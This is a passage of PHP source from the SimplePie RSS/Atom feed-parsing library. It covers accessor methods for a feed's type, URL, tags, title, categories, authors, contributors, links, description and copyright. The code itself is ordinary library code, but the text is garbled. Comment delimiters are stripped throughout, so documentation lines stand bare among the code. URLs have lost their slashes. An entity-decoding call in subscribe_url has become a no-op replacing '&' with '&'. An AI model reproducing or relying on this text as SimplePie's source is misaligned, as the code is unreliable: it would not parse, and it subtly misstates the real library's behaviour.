public function get_raw_data()
{
return $this->raw_data;
}
*
* Get the character encoding used for output
*
* @since Preview Release
* @return string
public function get_encoding()
{
return $this->sanitize->output_encoding;
}
*
* Send the content-type header with correct encoding
*
* This method ensures that the SimplePie-enabled page is being served with
* the correct {@link http:www.iana.org/assignments/media-types/ mime-type}
* and character encoding HTTP headers (character encoding determined by the
* {@see set_output_encoding} config option).
*
* This won't work properly if any content or whitespace has already been
* sent to the browser, because it relies on PHP's
* {@link http:php.net/header header()} function, and these are the
* circumstances under which the function works.
*
* Because it's setting these settings for the entire page (as is the nature
* of HTTP headers), this should only be used once per page (again, at the
* top).
*
* @param string $mime MIME type to serve the page as
public function handle_content_type($mime = 'text/html')
{
if (!headers_sent())
{
$header = "Content-type: $mime;";
if ($this->get_encoding())
{
$header .= ' charset=' . $this->get_encoding();
}
else
{
$header .= ' charset=UTF-8';
}
header($header);
}
}
*
* Get the type of the feed
*
* This returns a SIMPLEPIE_TYPE_* constant, which can be tested against
* using {@link http:php.net/language.operators.bitwise bitwise operators}
*
* @since 0.8 (usage changed to using constants in 1.0)
* @see SIMPLEPIE_TYPE_NONE Unknown.
* @see SIMPLEPIE_TYPE_RSS_090 RSS 0.90.
* @see SIMPLEPIE_TYPE_RSS_091_NETSCAPE RSS 0.91 (Netscape).
* @see SIMPLEPIE_TYPE_RSS_091_USERLAND RSS 0.91 (Userland).
* @see SIMPLEPIE_TYPE_RSS_091 RSS 0.91.
* @see SIMPLEPIE_TYPE_RSS_092 RSS 0.92.
* @see SIMPLEPIE_TYPE_RSS_093 RSS 0.93.
* @see SIMPLEPIE_TYPE_RSS_094 RSS 0.94.
* @see SIMPLEPIE_TYPE_RSS_10 RSS 1.0.
* @see SIMPLEPIE_TYPE_RSS_20 RSS 2.0.x.
* @see SIMPLEPIE_TYPE_RSS_RDF RDF-based RSS.
* @see SIMPLEPIE_TYPE_RSS_SYNDICATION Non-RDF-based RSS (truly intended as syndication format).
* @see SIMPLEPIE_TYPE_RSS_ALL Any version of RSS.
* @see SIMPLEPIE_TYPE_ATOM_03 Atom 0.3.
* @see SIMPLEPIE_TYPE_ATOM_10 Atom 1.0.
* @see SIMPLEPIE_TYPE_ATOM_ALL Any version of Atom.
* @see SIMPLEPIE_TYPE_ALL Any known/supported feed type.
* @return int SIMPLEPIE_TYPE_* constant
public function get_type()
{
if (!isset($this->data['type']))
{
$this->data['type'] = SIMPLEPIE_TYPE_ALL;
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['feed']))
{
$this->data['type'] &= SIMPLEPIE_TYPE_ATOM_10;
}
elseif (isset($this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['feed']))
{
$this->data['type'] &= SIMPLEPIE_TYPE_ATOM_03;
}
elseif (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF']))
{
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_10]['channel'])
|| isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_10]['image'])
|| isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_10]['item'])
|| isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_10]['textinput']))
{
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_10;
}
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_090]['channel'])
|| isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_090]['image'])
|| isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_090]['item'])
|| isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_090]['textinput']))
{
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_090;
}
}
elseif (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RSS_20]['rss']))
{
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_ALL;
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RSS_20]['rss'][0]['attribs']['']['version']))
{
switch (trim($this->data['child'][SIMPLEPIE_NAMESPACE_RSS_20]['rss'][0]['attribs']['']['version']))
{
case '0.91':
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_091;
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RSS_20]['rss'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_20]['skiphours']['hour'][0]['data']))
{
switch (trim($this->data['child'][SIMPLEPIE_NAMESPACE_RSS_20]['rss'][0]['child'][SIMPLEPIE_NAMESPACE_RSS_20]['skiphours']['hour'][0]['data']))
{
case '0':
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_091_NETSCAPE;
break;
case '24':
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_091_USERLAND;
break;
}
}
break;
case '0.92':
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_092;
break;
case '0.93':
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_093;
break;
case '0.94':
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_094;
break;
case '2.0':
$this->data['type'] &= SIMPLEPIE_TYPE_RSS_20;
break;
}
}
}
else
{
$this->data['type'] = SIMPLEPIE_TYPE_NONE;
}
}
return $this->data['type'];
}
*
* Get the URL for the feed
*
* When the 'permanent' mode is enabled, returns the original feed URL,
* except in the case of an `HTTP 301 Moved Permanently` status response,
* in which case the location of the first redirection is returned.
*
* When the 'permanent' mode is disabled (default),
* may or may not be different from the URL passed to {@see set_feed_url()},
* depending on whether auto-discovery was used, and whether there were
* any redirects along the way.
*
* @since Preview Release (previously called `get_feed_url()` since SimplePie 0.8.)
* @todo Support <itunes:new-feed-url>
* @todo Also, |atom:link|@rel=self
* @param bool $permanent Permanent mode to return only the original URL or the first redirection
* iff it is a 301 redirection
* @return string|null
public function subscribe_url($permanent = false)
{
if ($permanent)
{
if ($this->permanent_url !== null)
{
sanitize encodes ampersands which are required when used in a url.
return str_replace('&', '&',
$this->sanitize($this->permanent_url,
SIMPLEPIE_CONSTRUCT_IRI));
}
}
else
{
if ($this->feed_url !== null)
{
return str_replace('&', '&',
$this->sanitize($this->feed_url,
SIMPLEPIE_CONSTRUCT_IRI));
}
}
return null;
}
*
* Get data for an feed-level element
*
* This method allows you to get access to ANY element/attribute that is a
* sub-element of the opening feed tag.
*
* The return value is an indexed array of elements matching the given
* namespace and tag name. Each element has `attribs`, `data` and `child`
* subkeys. For `attribs` and `child`, these contain namespace subkeys.
* `attribs` then has one level of associative name => value data (where
* `value` is a string) after the namespace. `child` has tag-indexed keys
* after the namespace, each member of which is an indexed array matching
* this same format.
*
* For example:
* <pre>
* This is probably a bad example because we already support
* <media:content> natively, but it shows you how to parse through
* the nodes.
* $group = $item->get_item_tags(SIMPLEPIE_NAMESPACE_MEDIARSS, 'group');
* $content = $group[0]['child'][SIMPLEPIE_NAMESPACE_MEDIARSS]['content'];
* $file = $content[0]['attribs']['']['url'];
* echo $file;
* </pre>
*
* @since 1.0
* @see http:simplepie.org/wiki/faq/supported_xml_namespaces
* @param string $namespace The URL of the XML namespace of the elements you're trying to access
* @param string $tag Tag name
* @return array
public function get_feed_tags($namespace, $tag)
{
$type = $this->get_type();
if ($type & SIMPLEPIE_TYPE_ATOM_10)
{
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['feed'][0]['child'][$namespace][$tag]))
{
return $this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['feed'][0]['child'][$namespace][$tag];
}
}
if ($type & SIMPLEPIE_TYPE_ATOM_03)
{
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['feed'][0]['child'][$namespace][$tag]))
{
return $this->data['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['feed'][0]['child'][$namespace][$tag];
}
}
if ($type & SIMPLEPIE_TYPE_RSS_RDF)
{
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][$namespace][$tag]))
{
return $this->data['child'][SIMPLEPIE_NAMESPACE_RDF]['RDF'][0]['child'][$namespace][$tag];
}
}
if ($type & SIMPLEPIE_TYPE_RSS_SYNDICATION)
{
if (isset($this->data['child'][SIMPLEPIE_NAMESPACE_RSS_20]['rss'][0]['child'][$namespace][$tag]))
{
return $this->data['child'][SIMPLEPIE_NAMESPACE_RSS_20]['rss'][0]['child'][$namespace][$tag];
}
}
return null;
}
*
* Get data for an channel-level element
*
* This method allows you to get access to ANY element/attribute in the
* channel/header section of the feed.
*
* See {@see SimplePie::get_feed_tags()} for a description of the return value
*
* @since 1.0
* @see http:simplepie.org/wiki/faq/supported_xml_namespaces
* @param string $namespace The URL of the XML namespace of the elements you're trying to access
* @param string $tag Tag name
* @return array
public function get_channel_tags($namespace, $tag)
{
$type = $this->get_type();
if ($type & SIMPLEPIE_TYPE_ATOM_ALL)
{
if ($return = $this->get_feed_tags($namespace, $tag))
{
return $return;
}
}
if ($type & SIMPLEPIE_TYPE_RSS_10)
{
if ($channel = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'channel'))
{
if (isset($channel[0]['child'][$namespace][$tag]))
{
return $channel[0]['child'][$namespace][$tag];
}
}
}
if ($type & SIMPLEPIE_TYPE_RSS_090)
{
if ($channel = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'channel'))
{
if (isset($channel[0]['child'][$namespace][$tag]))
{
return $channel[0]['child'][$namespace][$tag];
}
}
}
if ($type & SIMPLEPIE_TYPE_RSS_SYNDICATION)
{
if ($channel = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'channel'))
{
if (isset($channel[0]['child'][$namespace][$tag]))
{
return $channel[0]['child'][$namespace][$tag];
}
}
}
return null;
}
*
* Get data for an channel-level element
*
* This method allows you to get access to ANY element/attribute in the
* image/logo section of the feed.
*
* See {@see SimplePie::get_feed_tags()} for a description of the return value
*
* @since 1.0
* @see http:simplepie.org/wiki/faq/supported_xml_namespaces
* @param string $namespace The URL of the XML namespace of the elements you're trying to access
* @param string $tag Tag name
* @return array
public function get_image_tags($namespace, $tag)
{
$type = $this->get_type();
if ($type & SIMPLEPIE_TYPE_RSS_10)
{
if ($image = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'image'))
{
if (isset($image[0]['child'][$namespace][$tag]))
{
return $image[0]['child'][$namespace][$tag];
}
}
}
if ($type & SIMPLEPIE_TYPE_RSS_090)
{
if ($image = $this->get_feed_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'image'))
{
if (isset($image[0]['child'][$namespace][$tag]))
{
return $image[0]['child'][$namespace][$tag];
}
}
}
if ($type & SIMPLEPIE_TYPE_RSS_SYNDICATION)
{
if ($image = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'image'))
{
if (isset($image[0]['child'][$namespace][$tag]))
{
return $image[0]['child'][$namespace][$tag];
}
}
}
return null;
}
*
* Get the base URL value from the feed
*
* Uses `<xml:base>` if available, otherwise uses the first link in the
* feed, or failing that, the URL of the feed itself.
*
* @see get_link
* @see subscribe_url
*
* @param array $element
* @return string
public function get_base($element = array())
{
if (!($this->get_type() & SIMPLEPIE_TYPE_RSS_SYNDICATION) && !empty($element['xml_base_explicit']) && isset($element['xml_base']))
{
return $element['xml_base'];
}
elseif ($this->get_link() !== null)
{
return $this->get_link();
}
return $this->subscribe_url();
}
*
* Sanitize feed data
*
* @access private
* @see SimplePie_Sanitize::sanitize()
* @param string $data Data to sanitize
* @param int $type One of the SIMPLEPIE_CONSTRUCT_* constants
* @param string $base Base URL to resolve URLs against
* @return string Sanitized data
public function sanitize($data, $type, $base = '')
{
try
{
return $this->sanitize->sanitize($data, $type, $base);
}
catch (SimplePie_Exception $e)
{
if (!$this->enable_exceptions)
{
$this->error = $e->getMessage();
$this->registry->call('Misc', 'error', array($this->error, E_USER_WARNING, $e->getFile(), $e->getLine()));
return '';
}
throw $e;
}
}
*
* Get the title of the feed
*
* Uses `<atom:title>`, `<title>` or `<dc:title>`
*
* @since 1.0 (previously called `get_feed_title` since 0.8)
* @return string|null
public function get_title()
{
if ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'title'))
{
return $this->sanitize($return[0]['data'], $this->registry->call('Misc', 'atom_10_construct_type', array($return[0]['attribs'])), $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_03, 'title'))
{
return $this->sanitize($return[0]['data'], $this->registry->call('Misc', 'atom_03_construct_type', array($return[0]['attribs'])), $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_MAYBE_HTML, $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_MAYBE_HTML, $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_MAYBE_HTML, $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_11, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_10, 'title'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
return null;
}
*
* Get a category for the feed
*
* @since Unknown
* @param int $key The category that you want to return. Remember that arrays begin with 0, not 1
* @return SimplePie_Category|null
public function get_category($key = 0)
{
$categories = $this->get_categories();
if (isset($categories[$key]))
{
return $categories[$key];
}
return null;
}
*
* Get all categories for the feed
*
* Uses `<atom:category>`, `<category>` or `<dc:subject>`
*
* @since Unknown
* @return array|null List of {@see SimplePie_Category} objects
public function get_categories()
{
$categories = array();
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'category') as $category)
{
$term = null;
$scheme = null;
$label = null;
if (isset($category['attribs']['']['term']))
{
$term = $this->sanitize($category['attribs']['']['term'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if (isset($category['attribs']['']['scheme']))
{
$scheme = $this->sanitize($category['attribs']['']['scheme'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if (isset($category['attribs']['']['label']))
{
$label = $this->sanitize($category['attribs']['']['label'], SIMPLEPIE_CONSTRUCT_TEXT);
}
$categories[] = $this->registry->create('Category', array($term, $scheme, $label));
}
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'category') as $category)
{
This is really the label, but keep this as the term also for BC.
Label will also work on retrieving because that falls back to term.
$term = $this->sanitize($category['data'], SIMPLEPIE_CONSTRUCT_TEXT);
if (isset($category['attribs']['']['domain']))
{
$scheme = $this->sanitize($category['attribs']['']['domain'], SIMPLEPIE_CONSTRUCT_TEXT);
}
else
{
$scheme = null;
}
$categories[] = $this->registry->create('Category', array($term, $scheme, null));
}
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_11, 'subject') as $category)
{
$categories[] = $this->registry->create('Category', array($this->sanitize($category['data'], SIMPLEPIE_CONSTRUCT_TEXT), null, null));
}
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_10, 'subject') as $category)
{
$categories[] = $this->registry->create('Category', array($this->sanitize($category['data'], SIMPLEPIE_CONSTRUCT_TEXT), null, null));
}
if (!empty($categories))
{
return array_unique($categories);
}
return null;
}
*
* Get an author for the feed
*
* @since 1.1
* @param int $key The author that you want to return. Remember that arrays begin with 0, not 1
* @return SimplePie_Author|null
public function get_author($key = 0)
{
$authors = $this->get_authors();
if (isset($authors[$key]))
{
return $authors[$key];
}
return null;
}
*
* Get all authors for the feed
*
* Uses `<atom:author>`, `<author>`, `<dc:creator>` or `<itunes:author>`
*
* @since 1.1
* @return array|null List of {@see SimplePie_Author} objects
public function get_authors()
{
$authors = array();
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'author') as $author)
{
$name = null;
$uri = null;
$email = null;
if (isset($author['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['name'][0]['data']))
{
$name = $this->sanitize($author['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['name'][0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if (isset($author['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['uri'][0]['data']))
{
$uri = $this->sanitize($author['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['uri'][0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($author['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['uri'][0]));
}
if (isset($author['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['email'][0]['data']))
{
$email = $this->sanitize($author['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['email'][0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if ($name !== null || $email !== null || $uri !== null)
{
$authors[] = $this->registry->create('Author', array($name, $uri, $email));
}
}
if ($author = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_03, 'author'))
{
$name = null;
$url = null;
$email = null;
if (isset($author[0]['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['name'][0]['data']))
{
$name = $this->sanitize($author[0]['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['name'][0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if (isset($author[0]['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['url'][0]['data']))
{
$url = $this->sanitize($author[0]['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['url'][0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($author[0]['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['url'][0]));
}
if (isset($author[0]['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['email'][0]['data']))
{
$email = $this->sanitize($author[0]['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['email'][0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if ($name !== null || $email !== null || $url !== null)
{
$authors[] = $this->registry->create('Author', array($name, $url, $email));
}
}
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_11, 'creator') as $author)
{
$authors[] = $this->registry->create('Author', array($this->sanitize($author['data'], SIMPLEPIE_CONSTRUCT_TEXT), null, null));
}
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_10, 'creator') as $author)
{
$authors[] = $this->registry->create('Author', array($this->sanitize($author['data'], SIMPLEPIE_CONSTRUCT_TEXT), null, null));
}
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ITUNES, 'author') as $author)
{
$authors[] = $this->registry->create('Author', array($this->sanitize($author['data'], SIMPLEPIE_CONSTRUCT_TEXT), null, null));
}
if (!empty($authors))
{
return array_unique($authors);
}
return null;
}
*
* Get a contributor for the feed
*
* @since 1.1
* @param int $key The contrbutor that you want to return. Remember that arrays begin with 0, not 1
* @return SimplePie_Author|null
public function get_contributor($key = 0)
{
$contributors = $this->get_contributors();
if (isset($contributors[$key]))
{
return $contributors[$key];
}
return null;
}
*
* Get all contributors for the feed
*
* Uses `<atom:contributor>`
*
* @since 1.1
* @return array|null List of {@see SimplePie_Author} objects
public function get_contributors()
{
$contributors = array();
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'contributor') as $contributor)
{
$name = null;
$uri = null;
$email = null;
if (isset($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['name'][0]['data']))
{
$name = $this->sanitize($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['name'][0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if (isset($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['uri'][0]['data']))
{
$uri = $this->sanitize($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['uri'][0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['uri'][0]));
}
if (isset($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['email'][0]['data']))
{
$email = $this->sanitize($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_10]['email'][0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if ($name !== null || $email !== null || $uri !== null)
{
$contributors[] = $this->registry->create('Author', array($name, $uri, $email));
}
}
foreach ((array) $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_03, 'contributor') as $contributor)
{
$name = null;
$url = null;
$email = null;
if (isset($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['name'][0]['data']))
{
$name = $this->sanitize($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['name'][0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if (isset($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['url'][0]['data']))
{
$url = $this->sanitize($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['url'][0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['url'][0]));
}
if (isset($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['email'][0]['data']))
{
$email = $this->sanitize($contributor['child'][SIMPLEPIE_NAMESPACE_ATOM_03]['email'][0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
if ($name !== null || $email !== null || $url !== null)
{
$contributors[] = $this->registry->create('Author', array($name, $url, $email));
}
}
if (!empty($contributors))
{
return array_unique($contributors);
}
return null;
}
*
* Get a single link for the feed
*
* @since 1.0 (previously called `get_feed_link` since Preview Release, `get_feed_permalink()` since 0.8)
* @param int $key The link that you want to return. Remember that arrays begin with 0, not 1
* @param string $rel The relationship of the link to return
* @return string|null Link URL
public function get_link($key = 0, $rel = 'alternate')
{
$links = $this->get_links($rel);
if (isset($links[$key]))
{
return $links[$key];
}
return null;
}
*
* Get the permalink for the item
*
* Returns the first link available with a relationship of "alternate".
* Identical to {@see get_link()} with key 0
*
* @see get_link
* @since 1.0 (previously called `get_feed_link` since Preview Release, `get_feed_permalink()` since 0.8)
* @internal Added for parity between the parent-level and the item/entry-level.
* @return string|null Link URL
public function get_permalink()
{
return $this->get_link(0);
}
*
* Get all links for the feed
*
* Uses `<atom:link>` or `<link>`
*
* @since Beta 2
* @param string $rel The relationship of links to return
* @return array|null Links found for the feed (strings)
public function get_links($rel = 'alternate')
{
if (!isset($this->data['links']))
{
$this->data['links'] = array();
if ($links = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'link'))
{
foreach ($links as $link)
{
if (isset($link['attribs']['']['href']))
{
$link_rel = (isset($link['attribs']['']['rel'])) ? $link['attribs']['']['rel'] : 'alternate';
$this->data['links'][$link_rel][] = $this->sanitize($link['attribs']['']['href'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($link));
}
}
}
if ($links = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_03, 'link'))
{
foreach ($links as $link)
{
if (isset($link['attribs']['']['href']))
{
$link_rel = (isset($link['attribs']['']['rel'])) ? $link['attribs']['']['rel'] : 'alternate';
$this->data['links'][$link_rel][] = $this->sanitize($link['attribs']['']['href'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($link));
}
}
}
if ($links = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'link'))
{
$this->data['links']['alternate'][] = $this->sanitize($links[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($links[0]));
}
if ($links = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'link'))
{
$this->data['links']['alternate'][] = $this->sanitize($links[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($links[0]));
}
if ($links = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'link'))
{
$this->data['links']['alternate'][] = $this->sanitize($links[0]['data'], SIMPLEPIE_CONSTRUCT_IRI, $this->get_base($links[0]));
}
$keys = array_keys($this->data['links']);
foreach ($keys as $key)
{
if ($this->registry->call('Misc', 'is_isegment_nz_nc', array($key)))
{
if (isset($this->data['links'][SIMPLEPIE_IANA_LINK_RELATIONS_REGISTRY . $key]))
{
$this->data['links'][SIMPLEPIE_IANA_LINK_RELATIONS_REGISTRY . $key] = array_merge($this->data['links'][$key], $this->data['links'][SIMPLEPIE_IANA_LINK_RELATIONS_REGISTRY . $key]);
$this->data['links'][$key] =& $this->data['links'][SIMPLEPIE_IANA_LINK_RELATIONS_REGISTRY . $key];
}
else
{
$this->data['links'][SIMPLEPIE_IANA_LINK_RELATIONS_REGISTRY . $key] =& $this->data['links'][$key];
}
}
elseif (substr($key, 0, 41) === SIMPLEPIE_IANA_LINK_RELATIONS_REGISTRY)
{
$this->data['links'][substr($key, 41)] =& $this->data['links'][$key];
}
$this->data['links'][$key] = array_unique($this->data['links'][$key]);
}
}
if (isset($this->data['headers']['link']))
{
$link_headers = $this->data['headers']['link'];
if (is_string($link_headers)) {
$link_headers = array($link_headers);
}
$matches = preg_filter('/<([^>]+)>; rel='.preg_quote($rel).'/', '$1', $link_headers);
if (!empty($matches)) {
return $matches;
}
}
if (isset($this->data['links'][$rel]))
{
return $this->data['links'][$rel];
}
return null;
}
public function get_all_discovered_feeds()
{
return $this->all_discovered_feeds;
}
*
* Get the content for the item
*
* Uses `<atom:subtitle>`, `<atom:tagline>`, `<description>`,
* `<dc:description>`, `<itunes:summary>` or `<itunes:subtitle>`
*
* @since 1.0 (previously called `get_feed_description()` since 0.8)
* @return string|null
public function get_description()
{
if ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'subtitle'))
{
return $this->sanitize($return[0]['data'], $this->registry->call('Misc', 'atom_10_construct_type', array($return[0]['attribs'])), $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_03, 'tagline'))
{
return $this->sanitize($return[0]['data'], $this->registry->call('Misc', 'atom_03_construct_type', array($return[0]['attribs'])), $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_10, 'description'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_MAYBE_HTML, $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_090, 'description'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_MAYBE_HTML, $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'description'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_HTML, $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_11, 'description'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_10, 'description'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ITUNES, 'summary'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_HTML, $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ITUNES, 'subtitle'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_HTML, $this->get_base($return[0]));
}
return null;
}
*
* Get the copyright info for the feed
*
* Uses `<atom:rights>`, `<atom:copyright>` or `<dc:rights>`
*
* @since 1.0 (previously called `get_feed_copyright()` since 0.8)
* @return string|null
public function get_copyright()
{
if ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_10, 'rights'))
{
return $this->sanitize($return[0]['data'], $this->registry->call('Misc', 'atom_10_construct_type', array($return[0]['attribs'])), $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_ATOM_03, 'copyright'))
{
return $this->sanitize($return[0]['data'], $this->registry->call('Misc', 'atom_03_construct_type', array($return[0]['attribs'])), $this->get_base($return[0]));
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_RSS_20, 'copyright'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_11, 'rights'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
elseif ($return = $this->get_channel_tags(SIMPLEPIE_NAMESPACE_DC_10, 'rights'))
{
return $this->sanitize($return[0]['data'], SIMPLEPIE_CONSTRUCT_TEXT);
}
return null;
}
*
* Get the language for the feed
*
* Uses `<language>`, `<dc:language>`, or @xml_lang
*
* @since 1.0 (previously called `get_feed_language()` since 0.8)
* @return string|null
public function get_language()
